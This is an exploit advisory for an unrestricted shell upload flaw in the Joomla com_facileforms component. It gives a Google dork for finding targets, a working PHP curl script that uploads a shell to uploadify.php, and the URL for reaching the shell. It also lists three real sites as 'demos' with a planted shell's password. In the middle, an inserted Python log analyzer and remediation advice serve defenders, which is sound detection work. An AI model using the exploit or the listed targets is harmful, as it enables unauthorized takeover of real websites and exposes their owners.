Joomla Component com_facileforms shell upload Vulnerability

-----------------------------------------------------------------------
Joomla Component com_facileforms shell upload Vulnerability
-----------------------------------------------------------------------

#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/com_facileforms/"
# Tested on : Windows 7, Backtrack 5r3
#####

#=> Exploit Info :
------------------
# The attacker can upload any file type, e.g. shell.php, .phtml, .aspx, .pl, ...
------------------

#=> Note : you can also use the Uploadify jQuery Generic File Upload Metasploit module by KedAns-Dz

#=> Exploit
-----------
<?php

$uploadfile = "zik.php";
$ch = curl_init("http://[target]/[path]/components/com_facileforms/libraries/jquery/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/components/com_facileforms/libraries/jquery/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print $postResult;
?>

Shell Access : http://[target]/[path]/components/com_facileforms/libraries/jquery/zik.php

<?php
phpinfo();
?>

-----------
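The request sequence above (an unauthenticated multipart POST to uploadify.php with a Filedata part and a folder parameter, followed by a GET of the dropped script from the same directory) is what a web-server access log records. The script below is an added example, not part of the advisory, that a site owner or responder can run over such a log to spot both steps; it assumes Apache/nginx "combined" log format, and the sample lines are constructed (documentation IP ranges, invented timestamps), not real traffic.

```python
import re

# Directory that holds the vulnerable upload handler (path from the advisory)
UPLOADIFY_DIR = "/components/com_facileforms/libraries/jquery/"
UPLOAD_ENDPOINT = "uploadify.php"

# Server-side script extensions that have no business appearing as new
# files inside a JavaScript library directory.
SCRIPT_EXT = re.compile(r"\.(php\d*|phtml|phar|pl|asp|aspx|jsp|cgi)$", re.IGNORECASE)

# Apache/nginx "combined" access-log format (assumed)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]  # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return 'upload_post', 'foreign_script_request' or None for a parsed record."""
    path = rec["path"]
    idx = path.find(UPLOADIFY_DIR)  # component may sit under a sub-path (e.g. /english/)
    if idx == -1:
        return None
    name = path[idx + len(UPLOADIFY_DIR):]
    if rec["method"] == "POST" and name == UPLOAD_ENDPOINT:
        return "upload_post"
    # Any server-side script in this directory other than uploadify.php itself
    if name != UPLOAD_ENDPOINT and "/" not in name and SCRIPT_EXT.search(name):
        return "foreign_script_request"
    return None


def analyze(lines):
    """Walk log lines in order; flag upload POSTs and requests for dropped scripts.

    A foreign-script request is marked confirmed when the same client already
    POSTed to uploadify.php and the server answered 200, i.e. the dropped file
    exists and was executed. A 404 means a probe for a file that is not there.
    """
    findings = []
    uploaders = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        if kind == "upload_post":
            uploaders.add(rec["ip"])
            confirmed = False
        else:
            confirmed = rec["ip"] in uploaders and rec["status"] == 200
        findings.append({
            "kind": kind,
            "ip": rec["ip"],
            "ts": rec["ts"],
            "path": rec["path"],
            "status": rec["status"],
            "confirmed": confirmed,
        })
    return findings


# Constructed sample log (not real traffic); 198.51.100.0/24 and 203.0.113.0/24
# are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.23 - - [12/Jan/2013:10:01:02 +0000] "GET /index.php?option=com_facileforms HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Jan/2013:10:01:09 +0000] "POST /components/com_facileforms/libraries/jquery/uploadify.php HTTP/1.1" 200 64 "-" "curl/7.26.0"',
    '198.51.100.23 - - [12/Jan/2013:10:01:15 +0000] "GET /components/com_facileforms/libraries/jquery/zik.php HTTP/1.1" 200 38211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jan/2013:10:02:00 +0000] "GET /components/com_facileforms/libraries/jquery/jquery.uploadify.js HTTP/1.1" 200 9201 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Jan/2013:10:02:03 +0000] "GET /english/components/com_facileforms/libraries/jquery/x.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        flag = "CONFIRMED" if f["confirmed"] else "suspect"
        print(f"{flag:9} {f['kind']:23} {f['ip']:15} {f['status']} {f['path']}")
```

On a real server, feed it the access log with `analyze(open(path))`. The legitimate jquery.uploadify.js request is ignored, the POST to uploadify.php is reported as a suspect upload attempt even on its own, and the 200 for zik.php from the same client is the confirmation that a file was dropped and executed; the safest remediation is to remove or block uploadify.php entirely, since the component's page flow never needs it to be reachable unauthenticated.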

#=> Demos
------------
http://worldleaguefootball.com/components/com_facileforms/libraries/jquery/uploadify.php

http://gv-herrliberg.ch/components/com_facileforms/libraries/jquery/uploadify.php

http://www.orion-construction.com/english/components/com_facileforms/libraries/jquery/uploadify.php
------------

=> Demo shell => replace uploadify.php with x.php => shell password : dz0




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


